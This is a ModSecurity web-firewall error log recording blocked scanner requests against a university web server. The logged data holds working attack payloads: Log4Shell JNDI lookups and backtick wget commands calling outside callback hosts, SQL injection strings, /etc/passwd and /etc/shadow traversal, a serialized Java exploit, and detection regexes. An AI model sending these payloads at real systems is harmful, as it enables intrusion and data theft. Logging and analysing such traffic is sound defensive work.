[Tue Aug 29 11:34:11.375823 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg16jog94wa4efu.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg16jog94wa4efu.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgdgh8wxcj1tpu4.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAAQKOtIAAAAs"]
[Tue Aug 29 11:34:12.401369 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAASEJTkAAAAE"]
[Tue Aug 29 11:34:13.336124 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASHh7AAAAAD"]
[Tue Aug 29 11:34:15.315522 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgnuxqg7w4egzts.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgnuxqg7w4egzts.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAQKOt8AAAAs"]
[Tue Aug 29 11:34:15.371680 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASVoIkAAAAe"]
[Tue Aug 29 11:34:16.389732 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAAPLwHUAAAAX"]
[Tue Aug 29 11:34:16.403577 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "mbkm.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASK4f0AAAAI"]
[Tue Aug 29 11:34:16.403604 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASK4f0AAAAI"]
[Tue Aug 29 11:34:16.406311 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAAShCWwAAAAi"]
[Tue Aug 29 11:34:17.394838 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAAPLwHkAAAAX"]
[Tue Aug 29 11:34:19.345058 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgpzokaupgsc9h7.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAAPLwH8AAAAX"]
[Tue Aug 29 11:34:19.359217 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASPDLcAAAAS"]
[Tue Aug 29 11:34:19.380246 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAASPDLgAAAAS"]
[Tue Aug 29 11:34:21.426451 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "164.68.96.104_3962302b7f14be5090531d0b9f23c5af96034ccd"): Internal error [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11TMCo-f0AAAShCYIAAAAi"]
[Tue Aug 29 11:34:21.542826 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "182.4.68.147_bfb0e7136b8e25b3f8d19010c0096b826acaeb78"): Internal error [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11TMCo-f0AAASI0C8AAAAG"]
[Tue Aug 29 11:34:21.610373 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "202.46.68.179_f6566a20762569eda65ae89eaba66c181ded0848"): Internal error [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11TMCo-f0AAASEJVsAAAAE"]
[Tue Aug 29 11:34:22.134700 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11TsCo-f0AAAPDoO0AAAAP"]
[Tue Aug 29 11:34:24.985478 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11UMCo-f0AAATXLJQAAAAb"]
[Tue Aug 29 11:34:25.617538 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "mbkm.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATzVGsAAAAx"]
[Tue Aug 29 11:34:26.184105 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAATxvW4AAAAw"]
[Tue Aug 29 11:34:26.327116 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUR82UAAABI"]
[Tue Aug 29 11:34:26.383052 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgbjm65iqn9md1n.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUKg@0AAABC"]
[Tue Aug 29 11:34:27.633639 2023] [:error] [pid 1279] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAT-IXIAAAA3"]
[Tue Aug 29 11:34:28.248578 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "mbkm.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VMCo-f0AAAUXLhMAAABM"]
[Tue Aug 29 11:34:29.332866 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgdthdq5npmcsmj.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAATQXgAAAAAO"]
[Tue Aug 29 11:34:29.365033 2023] [:error] [pid 1262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAATusz4AAAAv"]
[Tue Aug 29 11:34:29.408385 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATWYQQAAAAa"]
[Tue Aug 29 11:34:30.318792 2023] [:error] [pid 1229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgwtpjyhykh5xbe.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATNJYgAAAAF"]
[Tue Aug 29 11:34:30.423215 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgnpc9qd3n4hhks.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAAT@KuYAAAA2"]
[Tue Aug 29 11:34:31.424300 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATUxPwAAAAW"]
[Tue Aug 29 11:34:32.319382 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAAUDQR8AAAA7"]
[Tue Aug 29 11:34:32.323079 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAATUxP0AAAAW"]
